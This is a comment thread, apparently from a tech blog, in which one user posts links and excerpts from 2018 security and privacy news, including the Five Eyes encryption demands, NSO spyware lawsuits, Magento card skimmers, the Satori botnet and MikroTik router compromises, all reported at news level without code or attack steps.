Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry …
Spies still butthurt they can’t get at encrypted comms data
Five Eyes to tech: We have ways of making you comply
https://www.theregister.co.uk/2018/08/31/five_eyes_2018_meeting_encryption_terrorist_content/
The Five Eyes nations have told the tech industry to help spy agencies by creating lawful access solutions to encrypted services – and warned that governments can always legislate if they don’t.
The UK, US, Canada, Australia and New Zealand – which have a long-standing intelligence agreement – met in Australia this week.
In an official communiqué on the confab, they claim that their inability to lawfully access encrypted content risks undermining democratic justice systems – and issue a veiled warning to industry.
The group is careful to avoid previous criticisms about their desire for backdoors and so-called magic thinking – saying that they have “no interest or intention to weaken encryption mechanisms” – and emphasise the importance of privacy laws.
“Privacy laws must prevent arbitrary or unlawful interference, but privacy is not absolute,” the document stated.
The problem the Five Eyes have is that the principles that allow government agencies to search homes or personal effects don’t give them the ability to use the content of encrypted data.
The principles set out in the Five Eyes’ statement seek to stress that law enforcement’s inability to access the content of “lawfully obtained data” is the responsibility of everyone.
“Law enforcement agencies in our countries need technology providers to assist with the execution of lawful orders,” the group said.
Tomi Engdahl says:
Remote Mac Exploitation Via Custom URL Schemes
an offensive cyber-espionage campaign infects macs with a novel infection mechanism
https://objective-see.com/blog/blog_0x38.html
Tomi Engdahl says:
Exclusive: U.S. accuses China of ‘super aggressive’ spy campaign on LinkedIn
https://www.reuters.com/article/us-linkedin-china-espionage-exclusive/exclusive-chief-u-s-spy-catcher-says-china-using-linkedin-to-recruit-americans-idUSKCN1LG15Y
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
Tomi Engdahl says:
Philips Reports Its Own Device For Nine Security Vulnerabilities
https://www.bleepingcomputer.com/news/security/philips-reports-its-own-device-for-nine-security-vulnerabilities/
Philips evaluated one of its products and discovered that it was vulnerable to nine different security bugs, one of them of critical severity.
An advisory from the Industrial Controls Systems Cyber Emergency Response Team (ICS-CERT) on Thursday describes the vulnerabilities in Philips e-Alert Unit, warning that the device is exploitable remotely if exposed to the internet, or from the local network.
The horde of security flaws affects versions R2.1 and earlier of the product. Their severity ratings range from medium, for exposing information about the operating system and software components, to critical, for hardcoded credentials.
The e-Alert Unit from Philips is a solution that monitors the performance of medical imaging systems. It is not a medical device in itself but it alerts when key parameters on MRI machines are amiss.
Tomi Engdahl says:
CryptoNar Ransomware Discovered and Quickly Decrypted
https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/
This week a new CryptoJoker ransomware variant was discovered called CryptoNar that has infected victims. The good news, is that a free decryptor was quickly released so that these victims can get their files back for free.
Tomi Engdahl says:
MagentoCore Malware Found on 7,339 Magento Stores
https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores/
A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites.
The script is what industry experts call a “payment card scraper” or “skimmer.” Hackers breach sites and modify their source code to load the script along with its legitimate files.
The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker’s control.
MagentoCore —the most fertile payment skimmer to date
According to de Groot, this is “the most successful to date.”
The researcher says he found the script —which he named MagentoCore— on 7,339 Magento stores in the past six months.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.”
A quick PublicWWW search reveals that the MagentoCore script can still be found on 5,172 domains today, at the time of writing.
MagentoCore operated by one of the three MageCart groups
Tomi Engdahl says:
Cobalt Hacking Group Tests Banks In Russia and Romania
https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-tests-banks-in-russia-and-romania/
In new spear-phishing campaigns observed this month, the Cobalt hacking group targeted banks in Russia and Romania with emails containing two payloads pointing to two different command and control servers.
Cobalt is a cybercrime gang that operates since at least 2016 specialized in targeting financial organizations. According to data from Europol, the group is tied to cyberattacks against at least 100 banks across the world, stealing about one billion euros from them.
Although the alleged ringleader has been arrested in Spain this year, and three individuals believed to be members of the hacking crew have been charged at the beginning of the month, the group continues to operate.
Phishing email uses domain similar to financial organization
Tomi Engdahl says:
https://www.tivi.fi/Kaikki_uutiset/kiinalaiset-verkkotoimittajat-herattavat-epailyksia-ympari-maailman-nyt-huolestui-japani-6738864
Tomi Engdahl says:
http://www.etn.fi/index.php/13-news/8374-useimmista-androideista-loytyi-taas-haavoittuvuus
Tomi Engdahl says:
Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers
https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
Doctors and scientists say microwave strikes may have caused sonic delusions and very real brain damage among embassy staff and family members.
Tomi Engdahl says:
New York Times:
In lawsuits against Israeli hacking tools maker NSO Group, which claims to not spy with its tools, court docs allegedly show it snooping on calls to close sales
Hacking a Prince, an Emir and a Journalist to Impress a Client
https://www.nytimes.com/2018/08/31/world/middleeast/hacking-united-arab-emirates-nso-group.html
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked? How about the phone of a powerful Saudi prince who directed the kingdom’s national guard? Or what about recording the phone of the editor of a London-based Arab newspaper?
“Please find two recordings attached,” a company representative wrote back four days later, according to the emails.
The NSO Group’s actions are now at the heart of the twin lawsuits accusing the company of actively participating in illegal spying — part of a global effort to confront the growing arms race in the world of spyware.
As private companies develop and sell cutting-edge surveillance technology to governments for tens of millions of dollars, human rights groups say the scant oversight over the practice invites rampant misuse.
Tomi Engdahl says:
Rebecca Hill / The Register:
Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry …
https://www.theregister.co.uk/2018/08/31/five_eyes_2018_meeting_encryption_terrorist_content/
Tomi Engdahl says:
Wall Street Journal:
Google starts purging ads by scammers masquerading as authorized service agents for companies like Apple after a WSJ inquiry
Tech-Support Scams Prompt Google to Act
https://www.wsj.com/articles/tech-support-scams-on-google-trigger-crackdown-1535755023
Wall Street Journal investigation finds fraudsters use Google search ads to masquerade as authorized service agents for companies such as Apple
Tomi Engdahl says:
‘Five Eyes’ governments call on tech giants to build encryption backdoors — or else
https://techcrunch.com/2018/09/03/five-eyes-governments-call-on-tech-giants-to-build-encryption-backdoors-or-else/?sr_share=facebook&utm_source=tcfbpage
A pact of five nation states dedicated to a global “collect it all” surveillance mission has issued a memo calling on their governments to demand tech companies build backdoor access to their users’ encrypted data — or face measures to force companies to comply
Tomi Engdahl says:
Hacking a Prince, an Emir and a Journalist to Impress a Client
https://www.nytimes.com/2018/08/31/world/middleeast/hacking-united-arab-emirates-nso-group.html
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked?
Tomi Engdahl says:
Alleged ‘Satori’ IoT Botnet Operator Sought Media Spotlight, Got Indicted
https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/
A 20-year-old from Vancouver, Washington was indicted last week on federal hacking charges and for allegedly operating the “Satori” botnet, a malware strain unleashed last year that infected hundreds of thousands of wireless routers and other “Internet of Things” (IoT) devices. This outcome is hardly surprising given that the accused’s alleged alter ego has been relentless in seeking media attention for this global crime machine.
“Despite the havoc he supposedly wreaked, the accused hacker doesn’t seem to have been terribly knowledgeable about hacking,” Poulsen notes.
Schuchman reportedly went by the handle “Nexus Zeta,” the nickname used by a fairly inexperienced and clumsy ne’er-do-well who has tried on multiple occasions to get KrebsOnSecurity to write about the Satori botnet. In January 2018, Nexus Zeta changed the login page for his botnet control panel that he used to remotely control his hacked routers to include a friendly backhanded reference to this author
Nexus Zeta clearly had limited hacking skills initially and almost no operational security. Indeed, his efforts to gain notoriety for his illegal hacking activities eventually earned him just that, as it usually does.
Tomi Engdahl says:
Google cracks down on dodgy tech support ads
Verification programme aims to weed out the miscreants
https://www.theregister.co.uk/2018/09/03/tech_support_ads/
Google has placed restrictions on tech support ads after admitting it’s increasingly hard to tell promos for legit services from deceptions.
Tomi Engdahl says:
Google’s Doors Hacked Wide Open By Own Employee
https://www.forbes.com/sites/thomasbrewster/2018/09/03/googles-doors-hacked-wide-open-by-own-employee/amp/
Last July, in Google’s Sunnyvale offices, a hacker found a way to trick doors into opening without the requisite RFID keycard. Luckily for Google, it was David Tomaschik, an employee at the tech giant, who only had good intentions.
When he sent his malicious code across the Google network, he saw the lights turn from red to green on the door to his office. Then came the satisfying thunk as the lock opened. It was the culmination of work in which Tomaschik had uncovered vulnerabilities in technology made by Software House, the creator of the office controllers managing the physical security of the California site.
Last summer, when Tomaschik looked at the encrypted messages the Software House devices (called iStar Ultra and IP-ACM) were sending across the Google network, he discovered they were non-random; encrypted messages should always look random if they’re properly protected. He was intrigued and digging deeper discovered a “hardcoded” encryption key was used by all Software House devices. That meant he could effectively replicate the key and forge commands, such as those asking a door to unlock. Or he could simply replay legitimate unlocking commands, which had much the same effect.
Tomaschik also discovered he could do all this without any record of his actions. And he could prevent legitimate Google employees from opening doors. “Once I had my findings it became a priority. It was pretty bad,” he told Forbes. Google then moved quickly to prevent attacks on its offices, according to Tomaschik.
Tomi Engdahl says:
These People Were Just Trying To Get To Maui When They Got On A Horrible Flight Where Everything Went Wrong
https://www.buzzfeednews.com/article/mbvd/these-people-were-just-trying-to-get-to-maui-when-they-got
A flight from Oakland to Maui was delayed about 90 minutes because of a fake crime-scene photo. And because that apparently wasn’t enough airplane drama for one morning, the crew had to declare an emergency while airborne because pepper spray filled the cabin.
Hawaiian Airlines Flight 23 was originally set to take off Friday morning and was already taxiing when multiple passengers alerted the crew that they had received a horrifying photo of what appeared to be a dead child facedown in a crime scene with numerical markers.
At least 15 passengers were sent the gruesome photo
It turned out that the photo came from a 15-year-old girl who was trying to send an image from her high school medical-biology class to her mother, who was sitting next to her, but accidentally AirDropped the photo to the other passengers around her. AirDrop allows the instant transfer of files among supported Apple devices, like iPhones and iPads, as long as the option is turned on. The “dead” child in the image was actually a mannequin.
“She was telling her mom about the class, and her mom supposedly just got a new iPhone,” Kelly said. “People were a little alarmed by it.”
The girl and her mother were not allowed to continue on the flight and were rebooked on a flight Saturday, Kelly said. They were questioned by officers from the Alameda County Sheriff’s Office, who determined that there was no actual crime.
“Obviously, it inconvenienced some folks,”
Tomi Engdahl says:
How Cybercriminals Are Using Blockchain to Their Advantage
https://www.securityweek.com/how-cybercriminals-are-using-blockchain-their-advantage
Cybercriminals Have Been Experimenting With a Blockchain Domain Name System (DNS)
The takedowns of AlphaBay and Hansa in 2017 by law enforcement gave rise to much speculation about the future of dark web marketplaces. As I’ve discussed before, an environment of fear and mistrust are driving the cybercriminal community to incorporate alternative technologies to improve security and remain below the radar as they conduct illicit business online. One such technology is blockchain.
When most people hear the term “blockchain” they typically think of cryptocurrencies and other applications where transactions and interactions among a community of users must be executed with a high degree of trust, efficiency and transparency. However, if we consider the recent challenges that administrators of online criminal forums have encountered, it only makes sense that they would explore applications for blockchain. To that end, some have been experimenting with a blockchain domain name system (DNS) as a way of hiding their malicious activity and bullet-proofing their offerings.
A blockchain DNS is different from a traditional DNS. Typically, when we type a website into an Internet browser, a computer will query a DNS server for an IP address. Essentially, this is the Internet equivalent of a phone book.
Decentralized DNS offers many benefits such as countering censorship by authorities (for example if a government orders all Internet Service Providers in a country to stop redirecting domains to a relevant IP address), or preventing DNS spoofing, where attackers can insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker computer. However, decentralized DNS can also be abused by attackers for malicious purposes. As blockchain domains do not have a central authority and registrations contain unique encrypted hashes rather than an individual’s name and address, it is harder for law enforcement to perform site takedowns. The following are just a few examples of bad actors using blockchain.
Back in January 2016, one of the first groups to employ blockchain DNS to create a .bazar domain in an attempt to better secure their operations was a group known as The Money Team. In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain.
Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces.
As cybersecurity professionals, we should continue to monitor for an uptick in the adoption of blockchain for the buying and selling of illicit goods. And while we’re at it, we should also continue to assess other emerging technologies that could be used for nefarious purposes.
Tomi Engdahl says:
Critical Vulnerability Patched in PHP Package Repository
https://www.securityweek.com/critical-vulnerability-patched-php-package-repository
A critical remote code execution vulnerability was recently addressed in packagist.org, a large PHP package repository, a security researcher reveals.
An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The packagist.org site helps users search for packages and lets Composer know where to get the code from.
Tomi Engdahl says:
New lawsuit shows your phone is unsafe at American borders
CBP = Customs and Border Profiling
https://www.engadget.com/2018/08/31/new-lawsuit-shows-your-phone-is-unsafe-at-american-borders/
A recent case filed in federal court, in which an American woman had her iPhone seized and cracked by Customs and Border Protection in a New Jersey airport puts a whole new spin on the things we now need to worry about when leaving the country. It appears that now everyone’s phones, despite country of origin or cause, are subject to nonconsensual seizure and search — even if we refuse to give up our passwords.
If you’re not caught up on the story, news hit this week that a Staten Island mom coming home from a February trip with her 9-year-old daughter from Switzerland had her iPhone snatched, kept for months and accessed for no given reason.
Tomi Engdahl says:
Cryptojacking isn’t a path to riches – payout is a lousy $5.80 a day
Hackers shouldn’t quit their day scams if they want to eat
https://www.theregister.co.uk/2018/08/30/cryptojacking_pays_poorly/
Cryptojacking, the hijacking of computing resources to mine cryptocurrency, turns out to be both relatively widespread and not particularly profitable, according to a paper published by code boffins from Braunschweig University of Technology in Germany.
In a paper distributed via ArXiv, researchers Marius Musch, Christian Wressnegger, Martin Johns, and Konrad Rieck analyzed the prevalence of cryptomining on websites and found that 1 out of every 500 of the top million Alexa-ranked sites hosts cryptojacking code.
Where cryptocurrencies like Bitcoin depend on CPU cycles for solving the computational puzzles that generate currency, cryptocurrencies like Monero, Bytecoin, and Electroneum rely on memory resources. Commodity hardware can’t compete with GPUs and ASICs in the computation of Bitcoin hashes, but it can help churn out memory-bound calculations.
https://arxiv.org/pdf/1808.09474.pdf
Tomi Engdahl says:
Google’s Titan Security Key Explained | CNBC
https://www.youtube.com/watch?v=2d_pwtUcPIk
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services, too, as long as you don’t lose it. CNBC’s Todd Haselton puts it to the test.
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services from phishing attacks… as long as you don’t lose it.
Tomi Engdahl says:
This is Google’s Titan security key
https://techcrunch.com/2018/08/30/this-is-googles-titan-security-key/?guccounter=1
“We have had no reported or confirmed account takeovers since implementing security keys at Google,” a spokesperson told TechCrunch.
And it’s probably true. Think of a security key as like a two-factor authentication code that’s sent to your phone — but instead a USB stick in your pocket. Two-factor authentication is stronger than just a username and password, but text message codes can be intercepted and many sites and services don’t yet support the stronger authenticator codes.
What to know about Google’s Titan security key
https://www.washingtonpost.com/technology/2018/08/31/what-know-about-googles-titan-security-key/?noredirect=on&utm_term=.553a80c98993
Google on Thursday began selling a new piece of hardware called the Titan security key, which is designed to add another layer of protection for online security. But the company has faced criticism for producing the key in China through a partnership with manufacturer Feitian, according to a report from CNBC.
The product is labeled as being “Produced in China,” meaning, like many consumer electronics, that the security key is manufactured there. Some security experts, such as Adam Meyers at the security firm CloudStrike who was interviewed by the Information, say that having production overseas leaves Google open to infiltration by hackers or even the Chinese government during the assembly process.
Tomi Engdahl says:
Thousands of misconfigured 3D printers on interwebz run risk of sabotage
Security controls aren’t there to just look pretty, you know
https://www.theregister.co.uk/2018/09/04/3d_printers_hackable/
Internet-connected 3D printers are at risk of being tampered with or even sabotaged because users fail to apply security controls, a researcher has warned.
Xavier Mertens, a senior handler for the SANS Internet Storm Center (ISC) and freelance cybersecurity consultant, found more than 3,700 3D printers directly connected to the internet.
“These printers are controlled using the open source software package ‘OctoPrint’ but it’s likely there are other tools that are similarly affected. OctoPrint is not meant to be exposed in this way, and it explains in its documentation how to deploy the software in a safe way,” Mertens explained.
many OctoPrint instances are not properly configured and do not enforce authentication,
attacker would be able to download the files that describe parts being printed.
An attacker would also be able to swap out these files, replacing them with files that describe similar parts that are “weakened” to produce substandard or unsafe parts.
The problem here is users going out of their way to expose internal services on the public net.
“There’s no way to prevent people from exposing internal services on the net. I try to educate, I’m working on yet another prominent warning, but I can’t force people to perform proper (and inconvenient) network security.”
some printers do not have safety switches to prevent them from overheating, which means an attacker could attempt to start a fire by uploading a malicious file.
https://isc.sans.edu/forums/diary/3D+Printers+in+The+Wild+What+Can+Go+Wrong/24044/
Tomi Engdahl says:
7,500+ MikroTik Routers Are Forwarding Owners’ Traffic to the Attackers, How is Yours?
https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/
Each RouterBOARD device runs the RouterOS software system.[1]
According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.[2]
Both Winbox and Webfig are RouterOS management components
Since Mid-July, our Anglerfish Honeypot System has been picking up malware exploiting the above MikroTik CVE-2018-14847 vulnerability to perform various malicious activities.
What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.
More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.
Vulnerable Devices
From our own scan result, we logged more than 5,000K devices with open TCP/8291 port, and 1,200k of them were identified as Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.
The Attacks
CoinHive Mining Code Injection
Sock4 Proxy and the Mysterious 95.154.216.128/25
Eavesdropping
Suggestions
We recommend that MikroTik RouterOS users update the software system in a timely manner, and check whether the http proxy, Socks4 proxy and network traffic capture function are being maliciously exploited by attackers.
Tomi Engdahl says:
US Court of Appeals: An IP address isn’t enough to identify a pirate
https://www.techspot.com/news/76190-us-court-appeals-ip-address-isnt-enough-identify.html
Copyright owners will need more if they want a successful legal case
Why it matters: Judge rules that copyright trolls need more than just an IP address if they want to go after copyright infringement. An IP is not enough proof to tie a person to a crime.
Tomi Engdahl says:
Wall Street Journal:
Wall Street Journal survey: after the Atlanta ransomware attack, a majority of the 25 largest US cities have or are looking to buy cybersecurity insurance
More U.S. Cities Brace for ‘Inevitable’ Hackers
Majority of top 25 U.S. cities have, or are looking to buy, cybersecurity insurance
https://www.wsj.com/articles/more-cities-brace-for-inevitable-cyberattack-1536053401
Tomi Engdahl says:
SONARSNOOP
Researchers Used Sonar Signal From a Smartphone Speaker to Steal Unlock Passwords
https://motherboard.vice.com/en_us/article/kzyd4m/researchers-used-sonar-signal-from-a-smartphone-speaker-to-steal-unlock-passwords
Researchers at Lancaster University have use an active acoustic side-channel attack to steal smartphone passwords for the first time.
On Thursday, a group of researchers from Lancaster University posted a paper to arXiv that demonstrates how they used a smartphone’s microphone and speaker system to steal the device’s unlock pattern.
Although the average person doesn’t have to worry about getting hacked this way any time soon, the researchers are the first to demonstrate that this kind of attack is even possible. According to the researchers, their “SonarSnoop” attack decreases the number of unlock patterns an attacker must try by 70 percent and can be performed without the victim ever knowing they’re being hacked.
SonarSnoop exploits secondary information that will also reveal the password—in this case, the acoustic signature from entering the password on the device.
“SonarSnoop is applicable in any environment where microphones and speakers can interact.”
The attack begins when a user unwittingly installs a malicious application on their phone. When a user downloads the infected app, their phone begins broadcasting a sound signal that is just above the human range of hearing. This sound signal is reflected by every object around the phone, creating an echo. This echo is then recorded by the phone’s microphone.
By calculating the time between the emission of the sound and the return of its echo to the source, it is possible to determine the location of an object in a given space and whether that object is moving—this is known as sonar.
Tomi Engdahl says:
How refusing to give police your Facebook password can lead to prison
https://nakedsecurity.sophos.com/2018/09/04/how-refusing-to-give-police-your-facebook-password-can-lead-to-prison/
A 24-year-old murder suspect was sentenced to 14 months in prison on Friday for refusing to hand over his Facebook account password to detectives who are investigating the death of 13-year-old schoolgirl Lucy McHugh.
Stephen Nicholson, a friend of the family who’d been staying with them, was allegedly in contact with Lucy the morning of her disappearance. Police took him into custody and asked him – twice – for his password so they could check out the alleged conversation and whatever other content might help the investigation.
Nicholson has been jailed not for the murder, but for his refusal to cooperate with the detectives and let them into his account.
On Friday, he pleaded guilty to failing to disclose access codes to an electronic device under the Regulation of Investigatory Powers Act 2000 (RIPA).
According to the Independent, Nicholson argued that giving police access to his private Facebook messages could expose information relating to cannabis.
The judge scoffed, describing the excuse as “wholly inadequate”, considering the severity of the case.
Tomi Engdahl says:
‘Five Eyes’ Agencies Demand Reignites Encryption Debate
https://www.securityweek.com/five-eyes-agencies-demand-reignites-encryption-debate
Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called “backdoor” access to encrypted content and devices.
The reaction came following a weekend statement from the “Five Eyes” intelligence agencies calling on “industry partners” to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.
The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.
Tomi Engdahl says:
Android System Broadcasts Expose Device Information
https://www.securityweek.com/android-system-broadcasts-expose-device-information
Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.
The exposed information includes the WiFi network name, BSSID, local IP addresses, DNS server information, and the MAC address. Normally, extra permissions are required to access such details, but Wi-Fi broadcasts allow all applications to capture the information, thus bypassing existing mitigations.
Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.
Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, ths security firm says. Thus, all devices running under those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.
Tomi Engdahl says:
IoT Category Added to Pwn2Own Hacking Contest
https://www.securityweek.com/iot-category-added-pwn2own-hacking-contest
This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.
The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.
Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.
In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.
Tomi Engdahl says:
Lawsuit Lays Bare Israel-made Hack Tools in Mideast, Mexico
https://www.securityweek.com/lawsuit-lays-bare-israel-made-hack-tools-mideast-mexico
One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.
A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel’s NSO Group. He told The Associated Press he considered the phone compromised.
“I feared that someone could get back into it,” he said in an interview Friday. “I needed to protect my sources.”
Tomi Engdahl says:
Google Introduces Open Source Cross-Platform Crypto Library
https://www.securityweek.com/google-introduces-open-source-cross-platform-crypto-library
Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.
Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.
Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.
Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.
Google Develops OpenSSL Fork ‘BoringSSL’
https://www.securityweek.com/google-develops-openssl-fork-boringssl
Tomi Engdahl says:
Credit card gobbling malware found piggybacking on ecommerce sites
https://nakedsecurity.sophos.com/2018/09/04/credit-card-gobbling-code-found-piggybacking-on-ecommerce-sites/
Dutch security researcher Willem de Groot, who’s particularly interested in security problems on online payment sites, recently wrote about a long-running Magento malware campaign.
Magento is to ecommerce what WordPress is to blogging – you can run the open source version on your own servers; you can use an ecommerce partner who’ll run a Magento instance for you; or you can sign up for Magento’s own cloud platform.
Thousands of sites still run their own Magento servers, even in the modern cloud-centric era, for example because they’ve already got a customised warehousing and shipping system with which their ecommerce servers need to integrate.
Unfortunately, de Groot found that many of these sites – more than 7000 in total, he claims – have been infiltrated by cybercrooks in the past six months.
Worse still, de Groot estimates that nearly 1500 of them may have been infected for the entire six-month period.
Tomi Engdahl says:
Archive.org’s Wayback Machine is legit legal evidence, US appeals court judges rule
Big thumbs up to Internet Archive for now
https://www.theregister.co.uk/2018/09/04/wayback_machine_legit/
The Wayback Machine’s archive of webpages is legitimate evidence that may be used in litigation, a US appeals court has decided.
The second circuit ruling [PDF] supports a similar one from the third circuit – and, taken together, the decisions could pave the way for the Internet Archive’s library of webpages to be considered evidence for countless future trials.
The second circuit, based in New York, was asked over the summer to review an appeal by an Italian computer hacker in which he sought to exclude screenshots of websites run by him that tied him to a virus and botnet he was ultimately convicted over. Prosecutors had taken screenshots of his webpages from the Internet Archive and used them as trial evidence – and he wanted the files thrown out.
Fabio Gasperini argued that the presented Wayback Machine archives of his webpages were not adequately authenticated as legit and untampered, and so shouldn’t have been included in his criminal trial.
In the Gasperini case, however, the second circuit noted that the prosecution had included testimony from the Internet Archive’s office manager, “who explained how the Archive captures and preserves evidence of the contents of the internet at a given time.”
The Wayback Machine works by crawling over the web with bots that automatically fetch as many pages as they can find and store it all in a searchable public database, effectively snapshotting the world’s websites on a given day. For instance, if you want to see what The Register looked like in 1998, go right ahead.
The manager also testified that the prosecution’s screenshots of the Wayback Machine’s archive of Gasperini’s webpages really did match the contents of the Internet Archive
https://web.archive.org/web/19980628145626/http://www.theregister.co.uk:80/